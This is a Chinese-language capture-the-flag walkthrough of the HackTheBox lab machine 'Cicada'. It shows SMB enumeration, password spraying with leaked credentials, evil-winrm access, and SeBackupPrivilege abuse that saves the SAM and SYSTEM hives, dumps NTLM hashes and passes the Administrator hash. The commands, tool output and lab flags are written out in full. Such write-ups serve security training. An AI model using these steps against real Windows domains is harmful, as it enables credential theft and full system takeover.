HacktheBox-Cicada

信息搜集

1
2
3
4
5
6
7
8
9
10
start infoscan
10.10.11.35:445 open
10.10.11.35:135 open
10.10.11.35:139 open
10.10.11.35:88 open
[*] alive ports len is: 4
start vulscan
已完成 4/4
[*] 扫描结束,耗时: 7.961433112s

host 加一下。

USER

smb 信息泄露

注意到 445,尝试 smbclient 连接一下,先看下目录。

1
smbclient -L 10.10.11.35

其中的 HR 可以连接并获取目录,其他的没有读取权限。

注意这里下载是用 get 命令。

1
get "Notice from HR.txt"

本地浏览下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

里面说明了密码Cicada$M6Corpb*@Lp#nZp!8

用户枚举 Rid 爆破

用户枚举

1
enum4linux 10.10.11.35

1
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute

relative Identifier 相对标识符的暴力破解。

结果太多了,详细过滤下SidTypeGroup

1
2
3
4
5
6
7
8
9
10
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "SidTypeUser"
SMB                      10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

然后将其写到 users.txt 里面。

1
2
3
4
5
6
7
8
9
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

密码喷洒

然后用找到的密码喷洒。

1
crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

安装 apt install enum4linux-ng

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
enum4linux-ng -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -A 10.10.11.35
....
 ====================================
|    Users via RPC on 10.10.11.35    |
 ====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':                                                                      
  username: john.smoulder                                                    
  name: (null)                                                               
  acb: '0x00000210'                                                          
  description: (null)                                                        
'1105':                                                                      
  username: sarah.dantelia                                                   
  name: (null)                                                               
  acb: '0x00000210'                                                          
  description: (null)                                                        
'1106':                                                                      
  username: michael.wrightson                                                
  name: (null)                                                               
  acb: '0x00000210'                                                          
  description: (null)                                                        
'1108':                                                                      
  username: david.orelious                                                   
  name: (null)                                                               
  acb: '0x00000210'                                                          
  description: Just in case I forget my password is aRt$Lp#7t*VQ!3           
'1601':                                                                      
  username: emily.oscars                                                     
  name: Emily Oscars                                                         
  acb: '0x00000210'                                                          
  description: (null)                                                        
'500':                                                                       
  username: Administrator                                                    
  name: (null)                                                               
  acb: '0x00000210'                                                          
  description: Built-in account for administering the computer/domain        
'501':                                                                       
  username: Guest                                                            
  name: (null)                                                               
  acb: '0x00000214'                                                          
  description: Built-in account for guest access to the computer/domain      
'502':                                                                       
  username: krbtgt                                                           
  name: (null)                                                               
  acb: '0x00020011'                                                          
  description: Key Distribution Center Service Account

david.orelious:aRt$Lp#7t*VQ!3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
enum4linux-ng -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -A 10.10.11.35
 =====================================
|    Shares via RPC on 10.10.11.35    |
 =====================================
[*] Enumerating shares
[+] Found 7 share(s):
ADMIN$:                                                                       
  comment: Remote Admin                                                       
  type: Disk                                                                  
C$:                                                                           
  comment: Default share                                                      
  type: Disk                                                                  
DEV:                                                                          
  comment: ''                                                                 
  type: Disk                                                                  
HR:                                                                           
  comment: ''                                                                 
  type: Disk                                                                  
IPC$:                                                                         
  comment: Remote IPC                                                         
  type: IPC                                                                   
NETLOGON:                                                                     
  comment: Logon server share                                                 
  type: Disk                                                                  
SYSVOL:                                                                       
  comment: Logon server share                                                 
  type: Disk                                                                  
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share DEV
[+] Mapping: OK, Listing: OK
[*] Testing share HR
[+] Mapping: OK, Listing: OK
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: OK
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: OK

根据上述信息, david 可以访问 /DEV。使用 smbclient 查看。

1
smbclient -U david.orelious //10.10.11.35/DEV

1
2
3
4
5
6
7
8
9
10
11
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

emily.oscars:Q!3@Lp#M6b*7t*Vt

能登录,用 evil-winrm 登录。

1
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

能获取到 user.txt

6555995634d1a8c87ae5d6fdecc5e993

PE

SeBackupPrivilege 提权

查看权限:

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

通过 SeBackupPrivilege 进行提权。

Windows Privilege Escalation: SeBackupPrivilege - Hacking Articles

按照流程先创建 sam 用户:

1
2
reg save hklm\sam sam
reg save hklm\system system

下载下来:

1
2
download sam
download system

然后使用 impacket-secretdump 去获取到 ntlm 的 hash。

1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Administrator:2b87e7c93a3e8a0ea4a581937016f341

然后再用获得到的 hash 去登录即可:

1
evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

bc0bce2233f5d10c1bc027a136813eea